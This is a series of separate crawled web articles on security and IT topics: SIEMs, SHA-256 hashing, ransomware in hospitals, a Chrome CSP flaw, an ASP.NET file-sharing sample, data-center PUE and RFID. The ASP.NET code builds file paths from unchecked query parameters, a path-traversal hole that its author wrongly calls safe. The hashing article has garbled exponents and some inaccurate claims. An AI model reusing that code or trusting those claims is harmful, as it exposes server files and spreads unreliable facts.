At Digital Uppercut, no Cybersecurity plan is complete without a properly configured SIEM standing guard over your business and sending up alarms when there are issues. We let our clients know that an SIEM is critical to the success of any Cybersecurity plan, and we regularly install SIEMs in companies as small as just a few employees and as large as thousands of employees. In every environment, they have successfully identified incidents and helped us to block activities that could have otherwise crippled the organization. If you don’t have an SIEM yet, it’s time for us to talk. Contact us online today, or call us at 818-913-1335. | <urn:uuid:31e1a8a5-e41c-4351-ba0b-ffc150642da3> | CC-MAIN-2022-40 | https://www.digitaluppercut.com/2020/07/why-an-siem-is-critical-to-your-cybersecurity-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00593.warc.gz | en | 0.957746 | 1,449 | 2.6875 | 3 |
What Is the Most Secure Hashing Algorithm?
Beef up your data protection security with the most secure hashing algorithm. Learn how a one-way function can unlock your ability to truly excel in cybersecurity, protecting your sensitive data with virtually irreversible and unique hashes
2021 marked one of the most active years for cyberattacks and data breaches with software vendors experiencing the largest year-on-year growth ever (146%). As such, it’s hardly surprising that organizations are implementing smarter measures to tighten up the security of sensitive data and passwords in a more proactive way.
Well-known companies like Microsoft, TrendMicro, and GitHub are now dropping the SHA-1 algorithm because it’s been deprecated as a standard. This algorithm, used for years as an effective way to validate and protect the integrity of files, documents, and other types of data, has been deprecated (i.e., obsoleted) and replaced. But what has it been replaced with? That’s part of what we’ll explore in this article on the most secure hashing algorithm.
In this article, you’ll learn about the power of the most secure hashing algorithm, its key role in data integrity, and how it can help your organization withstand data breaches threats while complying with data security regulations and standards.
What’s the Most Secure Hashing Algorithm? SHA-256
SHA-256 (secure hash algorithm) is an algorithm that takes an input of any length and uses it to create a 256-bit fixed-length hash value. It doesn’t matter whether you hash a single word or the contents of the Library of Congress — the resulting hash digest will always be the same size. The “256” refers to the hash digest length.
SHA-256 is one of the hashing algorithms that’s part of the SHA-2 family (patented under a royalty-free U.S. patent 6829355). It’s the most widely used and best hashing algorithm, often in conjunction with digital signatures, for:
- Authentication and encryption protocols, like TLS, SSL, SSH, and PGP.
- Secure password hashing and verification.
- Cryptocurrency transaction verification (e.g., Bitcoin, 21Coin, Peercoin).
- Tokenization, which replaces sensitive data (e.g., credit card numbers, account IDs, etc.) with an unrecognizable string of random data during data transfers.
- File and software integrity checks (e.g., when a user downloads a signed file or code). The hash included in the code signing certificate will be recalculated and compared to establish the file or code’s integrity.
- Verifying the authenticity of messages or documents.
SHA-256 it’s a NIST’s (National Institute of Standards and Technology) recommended and officially approved standard algorithm. Thanks to the possibility of verifying the content of data without showing it, it’s also used by many governments and public-sector agencies worldwide, including the U.S. and Australia. But, what are the key features making this algorithm so popular among technology leaders, and secure to the point to be considered the most secure hashing algorithm available to date?
1. It’s a one-way algorithm. This means that it’s infeasible (too demanding in terms of time and resources) to reconstruct the original input from the output. Even through a brute force attack, an attacker would have to figure out the right combination of 0s and 1s — out of 2256 different possibilities (i.e., more combinations than the number of atoms in the universe) — to generate the initial data of an SHA-256 hash. To put it another way, it’s the equivalent of 1.158 x 1077, or 115,792,089,237,316,195,433,570,985,008,687,907,853,269,984,665,640,564,039,457,584,007,913,129,639,936
2. The chances of collision are extremely low. In fact, there is only one in more than
115 quattuorvigintillion (a 78 digit number) chances of collision.
3. Minor change = drastically different output. Even the most insignificant alteration to the original input always produces an entirely different output (i.e., what’s known as the avalanche effect). This resulting change makes it even more difficult for an attacker to use statistical analysis to predict the content of the original data.
4. SHA-256 has not been broken. Seriously. To date, no one managed to crack it even if there is a huge financial incentive to do so. Whoever will succeed in reverse engineering SHA-256 will be able to mine Bitcoin faster than anyone else and will end up making a huge amount of money.
What’s a Hash Algorithm?
As we touched on earlier, a hash algorithm is a function that takes an input of any length and scrambles it in an output of a fixed length (hash value or digest). If the input is altered, the associated hash value changes as well. This means that with a hash algorithm, you’ll be immediately able to spot if a file or a code has been changed (i.e., has a different hash value) or if two files are identical (your calculated hash value matches the one provided by the file).
In other words, a hash algorithm is a confirmation that the associated file or code is uncompromised — that it is what it says to be and hasn’t been manipulated or altered. In other words,s a hash function protects the integrity of the data or file in question.
To give you a practical example, the hash algorithm follows the same principle of the last digit of a bar code. This number, which is called a check digit, is always determined by the other digits that precede it. If one of the numbers changes, the last digit of the bar code will also change. This means that a computer store may end up with a cupcake in its inventory just because of a single wrong digit.
4 Reasons Why a Hash Algorithm Is Important
Hashing algorithms have come a long way since they were invented in 1941 and, thanks to their key attributes, they’re now an essential part of cybersecurity. Every hash function is:
- Easy to compute in one direction. Generating a hash value from any kind of data is easy, no matter the size of the original file. However, it’s very difficult to calculate back the value of the original input.
- Deterministic and not random. A hash algorithm is like a fingerprint: your thumb will always leave the same fingerprint. The same happens with hashing algorithms. Hashing a distinct input will always deliver the exact same hash value. This means that if two people check the hash value of the same file or code, they’ll be able to determine its authenticity as they should both get the same answer.
- Impossible to modify the input without changing the resulting hash value. Do you remember the avalanche effect we talked about toward the beginning of this article? This is exactly that. If the original file changes, even if the change is small, so does the output. This makes it really easy to verify the integrity of any file or code.
- Resistant to collisions. In other words, it should be difficult to find two different inputs (e.g., files or codes) with the same hash value. This is important if you’re distributing files on the web, for example. Without resistance to collision, an attacker could replace the original file with an infected one using the same hash. The file would appear authentic as it would have the same hash as the real file. As a result, when a user downloads it, its device will be infected.
Do you want to know more about hashing algorithms? Check our previous article and Computerphile’s hashing algorithms and security video:
- SHA-256 takes a plaintext input and returns a unique, fixed length output. A 256-bit output (32 bytes) displays as 64 hexadecimal alphanumeric characters ranging from [0-9] and [A-F].
- Security benefit 1: Ideal for password protection and verification, storing password hashes instead of plaintext passwords is much more secure.
- Security benefit 2: Perfect for code/data integrity checks through code signing certificates, enabling you to verify if the code or file has been tampered with, thus minimizing the risk of malware infections and corruption.
- Its output looks completely random and is unreadable. The resulting hash digest includes no identifying information about the original input.
- A hash is a one-way function. Basically, it has only one output for each input. On the other hand, ‘’there’s an infinite number of different combinations to get the same output making it virtually impossible to reverse engineer it, as explained in an excellent video made by Matthew Weathers. This differs from encryption, which is a two-way function (e.g., encryption) that’s intended to allow its original input to be computed from the output by the private key holder.
- Security benefit: Being infeasible to reverse makes it a powerful tool against even more sophisticated attacks.
Surely enough, if used correctly, it can help protect your organization from data breaches. Moreover, with the expansion of cloud services and IoT, a robust algorithm like SHA-256 has become a key player in preserving privacy, integrity, and ensuring secure communication among connected devices on the otherwise insecure internet.
This gets us nearly at the end of our journey into the most secure hashing algorithm world. Before we wrap up though, let’s have a quick look at how SHA-256 — considered the most secure hashing algorithm — differs from the other SHA families.
Not All SHA Families Are the Same: Learn the Differences
As mentioned by the Cybersecurity & Infrastructure Security Agency (CISA) in its hash function definition, SHA is divided into two different families:
- SHA-1 (Secure Hash Algorithm-1), and
- SHA-2 (including SHA-256).
You may have noticed that we didn’t include SHA-3 in the list. As its internal structure is pretty different from the previous two and it’s based on a new approach, SHA-3 has to be kept separate when discussing SHA families. We’ll talk more about it in one of our next articles but won’t get into all of that right now. For now, let’s stick with our topic of SHA-1 and SHA-2.
Published in 1995, SHA-1 is the very first version of the secure algorithm and, even if SHA-2 is in some way its updated version, and they’re both based on MD5 structure, they’re two distinctive families differing from each other in many ways. How? Let’s see.
SHA-1 vs. SHA-256 – Comparison Table
|Generated Hash value||160-bit (20 bytes) displayed as a 40-digit hexadecimal string.||256-bit (32 bytes) displayed as 64 hexadecimal alphanumeric characters.|
|Hash key features
||Shorter code, which results in less possibilities for unique combinations (thus a greater probability of collisions).||Extended code with a more complex hash value, thus the possibilities of collisions are nearly null.|
||Still used to sign some old SSL certificates, even if from 2016 all newly issued SSL/TLS certificates must use SHA-2.||Most used worldwide. From digital signatures to software integrity checks, from blockchain to password hashing.|
||Weak and susceptible to attacks (e.g., brute force). In fact, when a 2005 study showed the feasibility of breaking the SHA-1 algorithm, NIST quickly proposed in 2006 that the U.S. federal government move to SHA-2.||High.|
|Has it been broken?
||Yes, in 2017 when Google announced the first collision.||Still unbroken.|
||Deprecated.||Widely used and known as the most secure hashing algorithm.|
Final Thoughts on What Is the Most Secure Hashing Algorithm
To the time of writing, SHA-256 is still the most secure hashing algorithm out there. It has never been reverse engineered and is used by many software organizations and institutions, including the U.S. government, to protect sensitive information. It’s so secure that it’s even a central part of Bitcoin’s cryptographic protocol.
Now that you know what the most secure hashing algorithm is, don’t leave your data integrity at risk by relying on old and vulnerable cryptographic systems. There’s a much more powerful and secure hash mechanism available at your fingertips! Move to SHA-256 today and enhance your data security protection now.
Remember: Although it took years to build your organization’s reputation, it only takes a few minutes of a cybersecurity incident to destroy it. | <urn:uuid:53227e30-0ee0-40a0-84d4-abcb52c7d152> | CC-MAIN-2022-40 | https://codesigningstore.com/what-is-the-most-secure-hashing-algorithm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00593.warc.gz | en | 0.901556 | 2,737 | 2.625 | 3 |
As cases surge amidst an ongoing pandemic, hospitals face another crisis: ransomware. Dozens of hospitals have been targeted over the past few days and, in September, the RYUK ransomware strain impacted the IT systems of all 250 U.S Universal Health Services facilities1. Employees described a chaotic condition, where medical professionals resorted to using pen-and-paper for record-keeping.
Losing access to medical data and applications in a modern healthcare setting can have severe financial and potentially life-threatening consequences. In June, the University of California, San Francisco paid over $1.14M to attackers2. In September, a German woman seeking treatment died after a hospital was forced to reroute her due to a ransomware attack.3
Specifically Targeting Healthcare
In late October 2020, the FBI warned that ransomware is “an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers.”4 Obviously, the warning combined with the ongoing attacks means that healthcare systems must take timely and reasonable precautions to protect their networks.
Most of these recent attacks on healthcare organizations reportedly stem from a series of Russian cybercriminals who hold a list of over 400 potential healthcare targets, according to Hold Security.5
Underlying Technology and Methods
During this wave of ransomware attacks, the RYUK strain of malware has emerged as a primary vehicle to target healthcare environments. The initial compromise is generally performed through malware typically distributed via phishing emails. The malware helps establish a covert command and control channel into the compromised network. | <urn:uuid:48f4a4ef-7b4e-40b5-be22-3163a0437304> | CC-MAIN-2022-40 | https://www.cycognito.com/blog/ransomware-plagues-healthcare-with-disruptive-and-potentially-devastating-consequences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00593.warc.gz | en | 0.946123 | 308 | 2.65625 | 3 |
To view data sovereignty using a narrow lens may suffocate growth. It is recommended to deploy progressive and forward-thinking cyber strategies as we transition into a highly digital post-pandemic world.
Data privacy and protection have turned to be a point of contention as users’ private and confidential data is perceived to be easily accessible, ready to be tested, and replicated by machines for analyzing user behavior, surveillance, advertising, and other malicious objectives.
In the first half of 2020, Covid-19 upended ‘business as usual,’ and global relations are tested as governments focus on protecting jobs and appease impatient citizen groups. Data sovereignty has remained a heated discussion topic as European states enacted GDPR.
Over in Asia, nations with huge populations like Indonesia and India have been evaluating options to safeguard citizens’ data, and keeping data ‘on-soil’ has turned the vernacular among politicians. And today, even as rules are enacted to enforce data privacy, data sovereignty and protection can still be a burning issue.
Cyber risks and threats exist no matter where data is stored – it is the execution of robust cybersecurity strategies that can efficiently protect businesses and citizens’ data.
Instead of the repressive and authoritarian approach to data management under the pretext of ‘for the good of all,’ one would be better off promoting an open system for innovation, trade, and economic growth to flourish while assuring private and confidential data staying in safe and responsible hands.
Many nations face common technical challenges while trying to mitigate risks in the face of conflicting priorities. The following cybersecurity strategies will allow businesses to untangle the web of confusion, remove the reclusive mentality, and start embracing digital ecosystems confidently.
Approach cybersecurity holistically
To mitigate the fear of data breaches and cyber threats, enterprises need to adopt an intelligence-centric mindset. The statement ‘knowledge is power’ is highly relevant in this case. Leaders need to estimate the risks coming from the outside and be well-prepared and equipped to handle adversaries before the break of actual cyber-attacks.
A thorough understanding of “who, what, and why” about threat actors is important to counter any probable attack. A holistic threat landscape view will allow cybersecurity teams insights into digital risk, cyber-attacks, vulnerabilities, hackers’ interest, out of band, early warning, malware, and phishing campaigns to gauge looming cyber threats and risks.
Cybersecurity teams need to deploy a comprehensive approach to managing data, and this requires management, strategic, and tactical cyber-intelligence. Such multi-layer deployment invokes not mere security operations personnel but also governance and risk leaders. Corporate risk policy changes are required to ensure that cyber threats do not turn into cyber-attacks.
Regulatory environment that needs to change
Governments may have enacted cyber laws, but that’s not enough to enforce them. Another critical area would be to impose vulnerability assessment and mandatory risk, at least biannually, on large enterprises. This will help identify real-time threats, and remediation can take place to close any existing cybersecurity gaps.
Another approach would be to start attack vector assessments at least annually. These assessments will unveil new attack surfaces as firms adopt new digital formats and establish further supplier-partner-customer connectivity.
A cyber reward culture can be cultivated where the discovery of vulnerabilities and bugs are rewarded. This effort will help the cybersecurity community grow and promote a culture of joint solutions and knowledge sharing.
People, Process, Technology, and Governance
For many SMBs looking to ensure cyber resilience, it is crucial to building a basic cyber hygiene level. The priority is ‘people’ as employees must be educated on cyber threats and existing risks. This is particularly vital to eradicate the prevalence of social engineering hacking campaigns and phishing attacks.
From the technology perspective, businesses need to incorporate layered defenses with gateway-based security, data, endpoint security, automated scanning, regular monitoring, and malware removal.
Antivirus solutions, data protection, and loss detection, and VPN solutions need to be incorporated. When it comes to processes, firms should perform threat profiling, threat segmentation, risk containerization, and zoning.
Keeping the core content encrypted is both necessary and prudent. The basic process of daily data backup is an acceptable policy to adopt too. Considering governance, businesses should inculcate excellent cyber threat visibility and intelligence program for developing a robust cybersecurity strategy.
Innovation, open systems, entrepreneurship, inter-connection – these are views that result in fresh growth possibilities.
It is prudent to deploy progressive and forward-thinking cyber strategies as the world marches into a totally digital post-pandemic world. | <urn:uuid:5fc57acf-be0b-4aa8-a908-1d8b1142706d> | CC-MAIN-2022-40 | https://itsecuritywire.com/featured/data-sovereignty-and-progressive-cyber-security-strategies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00593.warc.gz | en | 0.919209 | 960 | 2.53125 | 3 |
A vulnerability in Chromium-based browsers would allow attackers to bypass the Content Security Policy (SPC) on websites to steal data and execute dangerous code.
Chrome 73 versions (March 2019) to 83 are affected (84 was released in July 2020 and solves the problem). CSP is a web standard that aims to frustrate certain types of attacks, including site scripts (XSS) and data injection attacks. CSP allows web administrators to specify areas that a browser should consider valid sources of executable scripts.
A CSP-compatible browser will only run scripts uploaded to source files received from those domains. “CSP is the primary method used by website owners to implement data security policies to prevent the execution of harmful codes on their website so that when it can be bypassed, the user’s personal data is at risk,” Weizman explained in research published on Monday, August 10.
“To better understand the scale of this vulnerability – potentially affected users are billions, Chrome having over two billion users and over 65% of the browser market on the one hand, and some of the most popular websites on the web being vulnerable to this CVE on the other,” says Gal Weizman.
The vulnerability (CVE-2020-6519) ranks as a medium severity security issue (6.5 out of 10 on the CvSS scale – Common Vulnerability Scoring System).
However, because it affects the application of CSP, it has vast implications, Weizman said, comparing it to a car that has problems with seat belts, airbags and collision sensors.
The vulnerability was present in Chrome browsers more than a year before it was fixed, so Weizman warned that the full implications of the bug are not yet known.
Make sure your Chrome browser version is 84 or higher.
Users should update their browsers to the latest versions to avoid becoming the victim of this vulnerability. If sites have applications use them, instead of browsing through the browser. | <urn:uuid:cb5eb502-155d-448c-871d-c405cbb3aae2> | CC-MAIN-2022-40 | https://cybersecuritymag.com/google-chrome-vulnerability-data-theft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00593.warc.gz | en | 0.926294 | 540 | 2.609375 | 3 |
This week: Linux File Permissions
To maintain proper security, users should have exactly the level of access that they need to do their jobs — no more, no less. That's why knowing how to manage and maintain file permissions is an understated, but incredibly important, skill. Knowing when to chmod versus chown or use a uid or gid is all part of the job.
This week, we give you a crash course in Linux permissions, executables, and the fundamentals of uid and gid.
When it comes to administering and securing Linux environments, understanding umask and file permissions is crucial. Learn how both these factor into Linux security.
Setuid and setgid are a way for users to run an executable with the permissions. Learn why they are so crucial and Linux admins can leverage them.
User identifier (uid) and group identifier (gid) are fundamental concepts that any Linux system administrator needs to know. Learn what they do and how they play a role in file permissions. | <urn:uuid:3d02bd03-13ce-4a4a-a171-63722674c44a> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/system-admin/this-week-linux-file-permissions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00593.warc.gz | en | 0.919834 | 210 | 2.921875 | 3 |
One of the most common requests I hear is to provide an “easier-than-easy” way to make documents available on the web. Easy is a web form with a file upload control, so that won’t cut it. Easier-than-easy refers to the same drag-and-drop simplicity that users are accustomed to when sharing files over a network.
This sample application provides a web-based interface to a file system. It is coded in ASP .NET, and showcases the language’s ability to send files over HTTP with minimal code.
Starting with line 3, we point the application to the home directory. It makes sense to define a top-level folder in the application and work with paths relative to it. This is so that a user can’t pass “c:\” to the web application and get at system files; only resources within c:\webapps are available.
Lines 4 and 5 attempt to retrieve parameters from the HTTP request, identifying whether the user has clicked a link to a file or a subdirectory. If a file has been requested, lines 8 and 9 format the HTTP response so that it prompts the user with a download dialog. Line 11 is the method call that actually sends the file – Response.WriteFile() is a new feature in .NET that helps abstract away some of the complexities of file I/O.
If a file link wasn’t clicked, we check to see if a subdirectory link was clicked. If not, we print the listing of the base folder. If a subdirectory was clicked, we change the current folder and get its listing instead.
When looping through the directories and files to create links, we trim off the base folder part of the path using the substring method. Even if a user of this application views the page source, there will be no indication of where these files are actually housed on the server.
You need to be careful not to print any stray HTML tags when returning a file. Anything else written to the HTTP response can potentially corrupt the file’s contents. It’s a good idea to include lines such as 10 and 12 to flush the Response before writing the file and end it when the file is sent.
I also have a version of this application coded in Java, and would be happy to send the source to anyone who emails me for it.
3: Dim BaseFolder as String = “c:\\webshare”
4: Dim RequestedFile as String = Request.QueryString.get(“file”)
5: Dim CurrentFolder as String = Request.QueryString.get(“dir”)
6: if Not RequestedFile Is Nothing then
7: Dim file as new FileInfo(BaseFolder+”\”+RequestedFile)
8: Response.ContentType = “application/octet-stream”
9: Response.AddHeader(“Content-Disposition”,”attachment; filename=””” + file.Name + “”””) 10: Response.Flush()
14: if CurrentFolder Is Nothing then
15: CurrentFolder = BaseFolder
17: CurrentFolder = BaseFolder+”\”+CurrentFolder
18: end if
19: Dim dir As New DirectoryInfo(CurrentFolder)
20: Response.Write(““+ CurrentFolder.Substring(BaseFolder.length) +”\
24: Dim subdir as DirectoryInfo
25: For each subdir in dir.GetDirectories()
27: Next subdir
31: Dim file As FileInfo
32: For Each file In dir.GetFiles()
34: Next file | <urn:uuid:914406fd-c6ec-4cad-bbea-600bda8fc3fa> | CC-MAIN-2022-40 | https://www.itworldcanada.com/article/webshare-interface/15130 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00793.warc.gz | en | 0.86369 | 923 | 2.5625 | 3 |
Cybersecurity Explained as Physical Security
We often need to think about security in the context of both physical security and digital security. The act of a cyber attack is typically not a singular event. Oftentimes we see hackers using multiple levels of probing before they execute their attack. We are going to reference each action that happens during the typical cyber-attack and relate it to the physical security of your home.
The Drive-by Scan:
If you are connected to the internet you are susceptible to all sorts of drive-by attacks and drive-by scans. These scans are an initial phase of data gathering and investigation that are typically being executed by a bot. In the physical realm, this is where a criminal may be driving by in their car looking at your house. They may be looking in the windows or the door and seeing what shape they are in. They are looking to see if you might have a window open that they might be interested in.
On the digital side of that analogy would be where a threat takes and runs a scan against your public IPS or your public assets and understands what ports you have open, or what ports you are having services to that might have SSL certificates or not. The threat then starts to understand a little bit about your footprint from a digital perspective.
The Deeper Scan
At this point, they have garnished enough information about your environment and move on to a deeper investigation. We call this a deeper scan. To relate this to the physical side, this would be where somebody would pull in your driveway. They might even walk up to your door and, and act like they are dropping something off.
Next is where a bot has done all of its work and a deeper level scan will be started by an actual human being. This is the first time the attacker attempts to access your environment. In the physical realm, this is where we would see somebody walk up to the door, they might even test the door, or walk around your back of your house and they notice that you had a door that was unlocked.
The First Attempt
Everybody, at some point in time, becomes comfortable with their current security configuration. When people begin to become complacent then they start leaving a door or window unlocked when they leave. In the digital realm, this is happening a lot. Not everybody realizes that a criminal hacker can gain access to an environment and you might not even know it. A hacker may gain access to your environment and not even touch anything. They looked around and they got back out, which then tends to lead into the attack.
The First Attack
Over the course of the last week or two, they have noticed that you have made zero changes. They have figured out your configuration that you are comfortable with. The attackers then go in and they start the attack. We have seen this with a prospective client. It was discovered by a digital forensics firm that the attack happened over the course of multiple months. After the first attack, they were able to ransom the environment. The prospective client then either had two choices. They could either pay the ransom or they could do a restore of their data and servers. | <urn:uuid:c01a0bed-4f17-42c1-a43f-f34fa8c2dd0d> | CC-MAIN-2022-40 | https://www.bitlyft.com/resources/how-do-cyber-criminals-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00793.warc.gz | en | 0.978619 | 639 | 3.15625 | 3 |
Modern technology runs on electricity, and the computers and data centers at the core of daily life require a lot of it. One report from the 2013 Annual Energy Outlook estimated that computers and related equipment accounted for 3% of the United States’ energy consumption. In the search to maximize energy efficiency, many companies are looking into ways to minimize this energy consumption by computers and related equipment. One way many companies are doing this is by benchmarking their data center’s energy efficiency, which is critical to decreasing power use and related costs.
Benchmarking helps companies understand their current efficiency and gives them a metric to judge efficacy as they implement new efficiency best practices. One benchmarking standard commonly used for data centers is PUE. So what is PUE, and how can it be used to improve your data center’s efficiency?
What Does PUE Mean?
PUE stands for Power Usage Effectiveness. Green Grid proposed and developed the idea. Green Grid is a nonprofit IT industry group of experts from different disciplines who collaborate on ways to improve energy efficiency in the industry. Since its introduction, PUE has become the primary metric professionals use to measure energy efficiency in data centers.
IT professionals use PUE as a benchmarking system to determine the energy efficiency of their data centers and monitor efficiency changes over time. Essentially, PUE compares the total energy entering a data center to the energy used by that data center’s IT equipment. The resulting number quantifies how effective the data center is at using the input power. Experts can use this number to understand how the data center compares with similar data centers in similar locations and conditions and determine whether the company needs to improve efficiency through technological or architectural changes.
How to Calculate PUE
The calculations to determine PUE data center numbers are relatively straightforward, but require careful measurement and regular implementation. The general PUE data center formula is simple — PUE can be calculated by dividing total facility power by IT equipment power. These values are defined and explained below:
- Total facility power: Calculating PUE effectively requires knowing how to measure total facility power. Know what components are at play in your data center and how to monitor their performance using the appropriate meters and sensors. You’ll also want to consider building management software that continually monitors power consumption for the facility.
- Find the total IT load: Use direct power supplies for your IT equipment to find the IT load for your data center. This can usually be calculated by using meters to measure activity from the uninterruptible power supply (UPS) and the power distribution unit (PDU).
A value of around 2.0 is average, while a higher value is considered inefficient and a lower value is considered efficient.
How to Use PUE
While the PUE value is important, it is most valuable when tracked carefully and repeatedly over time. Green Grid gives the following guidance for calculating and using PUE and how to improve data center PUE using this information:
- Take measurements: The first step should be to take a thorough reading of your facility’s total power usage and total IT load. Use these measurements to get an overall PUE measurement. This measurement will help determine a course of action.
- Set your objectives: PUE means nothing if it doesn’t inform goals. Create an efficiency improvement plan based on your measurements. This plan may be as simple or as complex as you’d like but should use PUE to set quantifiable and achievable goals. Be sure to set up sensors in appropriate locations to monitor the right areas for specific goals, such as cooler power usage.
- Develop a testing schedule: Regularly test and calculate PUE in your data center. This can easily be programmed as a continuous measurement automated through your software system. Doing this allows your decisionmakers to collect and review PUE data regularly and view both overall PUE for the data center as well as detailed hour-by-hour fluctuations that may help determine how to handle peak loads.
- Take action: Use the data collected to your advantage. Use modeling tools to analyze and adjust airflow, eliminate idle servers, adjust cooling infrastructure settings and update outdated tech. Use tests to determine if the changes have made significant improvements and repeat the cycle as many times as needed.
Following these steps can help leverage PUE to your company’s advantage, and there are many advantages PUE can offer.
The Benefits of PUE
As discussed previously, data centers consume massive amounts of energy. One study found that U.S. data centers consumed approximately 70 billion kilowatt-hours in 2014, which is about 1.8% of national electricity consumption. This power usage represents both an environmental and a cost concern to many businesses. With the introduction of PUE, however, businesses now have a way to quantify efficiency. This presents numerous benefits, including the following:
- Environmental benefits: Energy consumption represents a massive carbon footprint within the IT industry. Previously, companies did not have a way to quantify efficiency, which made it easier to lose track of this value. PUE creates a simple system to quantify efficiency, which makes it easier for businesses to visualize, prioritize and implement efficiency initiatives. This has effectively increased the creation of eco-friendly computing centers.
- Resource utilization: Implementing a PUE monitoring plan is a great way to visualize and monitor all areas of a data center. The resulting data can be used to identify wasted or under-utilized resources, allowing decisionmakers to reallocate those resources effectively.
- Decrease costs: The ultimate bottom line for any business is cost, and using PUE is a great way to help save money. Maximizing efficiencies can save money on electricity bills and ensure that resources are used effectively.
By automating PUE calculation and analysis, your business can maximize these benefits by eliminating manual intervention. As advanced systems become more readily available, we may see these calculations even used to manage energy sources and optimize efficiencies automatically.
Learn More From DataSpan
If you want to learn more about calculating or leveraging PUE for your data center, DataSpan can help. For more than 40 years, DataSpan continues to be a national technology solutions provider. From IT physical infrastructure to data center IT services, we help our customers accomplish more with fewer resources.
Contact DataSpan today to learn more about our services and how they can help your business improve efficiencies. | <urn:uuid:3d315255-7ff5-469e-843d-2e65bada57be> | CC-MAIN-2022-40 | https://dataspan.com/blog/data-center-pue/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.925125 | 1,309 | 2.765625 | 3 |
Businesses are always on the lookout for methods of improving efficiency in their operations. For many, automation and technology are attractive choices, though some options may be prohibitively costly for smaller businesses. One option that has caught the attention of businesses of all sizes is radio frequency identification, or RFID.
RFID is a highly versatile wireless identification and tracking technology that can be applied at any level of the supply chain for businesses of every size. Businesses that have implemented RFID have found significant improvements in efficiency and cost reduction, among other areas. This article explains the details of RFID, how it works, the benefits of such a system and how to implement an RFID system in your own business.
What Is RFID?
Radio frequency identification is a type of wireless technology. In an RFID system, there are two key components — an RFID tag and an RFID scanner:
- RFID tag: An RFID tag or smart label consists of an integrated circuit and antenna. The tag is essentially a small microchip that contains encoded digital data and can pick up signals and transfer data using its antenna. While the microchip is extremely small, it can hold massive amounts of this encoded data, and that data can be changed or updated as needed. Data typically includes identification information, product data or other information depending on the application.
- RFID scanner: An RFID scanner is a specialized scanner that collects the information stored in the RFID tag. The information is transferred from the microchip to the scanner using radio waves, meaning that the scanner does not need a direct line-of-sight alignment with the chip to read it. The scanner can also pick up information from multiple tags at once.
A common example of an RFID system is pet microchipping. A pet microchip is embedded in a pet’s skin after it is adopted and stores information about the pet and its owner. This chip can then be scanned to identify the owner if the pet gets lost.
How Does RFID Work?
RFID technology works using radio waves and signals to collect and transfer data. When an RFID scanner is used, it sends out a signal, which the RFID tag picks up and responds to. The tag then sends out its encoded data over radio waves to the scanner. The scanner picks up these waves, converts them into useable data and transfers the data from the tags to a host computer system to store and analyze the collected data.
Specific RFID systems differ primarily in the types of tags used in the system. These are primarily organized by frequency range and whether the tag is active or passive:
- Low-frequency: Low-frequency RFID systems have shorter ranges and read data more slowly, but work well in environments with heavy interference from liquids and metals. These systems are commonly used in livestock management.
- High-frequency: High-frequency systems have longer ranges and faster data reading capabilities compared to low-frequency systems and are often used in hotel key card systems, payment cards and security systems.
- Ultrahigh-frequency: Ultrahigh-frequency RFID systems are used in situations that require extremely fast data transfer. Common examples include retail inventory management and anti-counterfeiting systems.
- Passive: Passive tags do not have their own substantial energy source. Instead, they use energy from the RFID scanner to reflect back a signal.
- Active: Active tags contain their own energy source and broadcast their signal at regular intervals, which a local RFID scanner can then pick up.
The type of tag system used largely depends on the needs of the specific application.
In theory, RFID technology is similar to barcoding in that a product is scanned to collect information. However, RFID chips are actual microchips that contain data, while barcodes simply provide a link to data stored on the internet. Also, RFID chips can be scanned at a distance without a line of sight. These two qualities mean that RFID chips do not rely on internet connections and are faster and easier to scan than traditional barcodes.
Benefits of RFID
RFID systems offer benefits to a range of industries and can be implemented in businesses of all sizes. Some of the key benefits for businesses include the following:
- Improved inventory tracking and management: Tracking assets and materials is a key function in any business at any point in the supply chain. RFID systems offer a faster and more reliable way of tracking items, as they allow multiple items to be scanned at once instead of counting or scanning individual items.
- Reduced labor investments: RFID systems automatically scan items and upload information into a computer system. With proper setup, this can remove the need for manual scanning, tracking and data entry, allowing labor to be redistributed to more value-adding functions.
- Maximized accuracy: By automating data collection and entry, RFID can minimize the potential for costly human error, such as transcription errors, data duplication and deletions.
- Enhanced traceability: Because RFID tags can be updated, they can track which processes a product has gone through. For example, an RFID tag can be updated when its associated product goes through inspection. Then the distribution center may verify that every product has gone through an inspection before sending out products to customers.
- Shortened turnaround: Integrating automated RFID processes can streamline processes by eliminating time-expensive scanning and tracking procedures, shortening turnaround times for customers.
- Improved revenues: By reducing labor costs and losses and maximizing efficiencies, RFID systems can quickly improve revenue, which offsets the implementation costs.
Businesses of all types can experience these benefits, and many industries are exploring the potential applications of RFID in new sectors. For example, the medical industry has been researching the benefits of applying RFID to improve workflows and prevent medical errors. Studies found that the use of tags with RFID technology in medical settings helped match medication with patients, streamlined physician workflows and even reduced instrument loss.
RFID is on the rise in a range of industries, most notably in retail, manufacturing and transportation. Applications of RFID today primarily focus on asset tracking, access control, payment systems and supply chain tracking, but new applications are emerging as the technology makes headway in more industries.
If you’re thinking of implementing RFID in your business, you’ll want to know what the process looks like. Here are the general steps for implementing an RFID system:
- Compare vendors: Find an RFID vendor that has experience working with companies similar to yours. If you’re a small business, look for vendors that have experience working with small companies.
- Identify applications: Determine where your business can benefit from RFID. Focus on one area at a time and determine what processes will need to be changed to facilitate implementing RFID. Once you have a plan, organize implementation into stages with your vendor’s help.
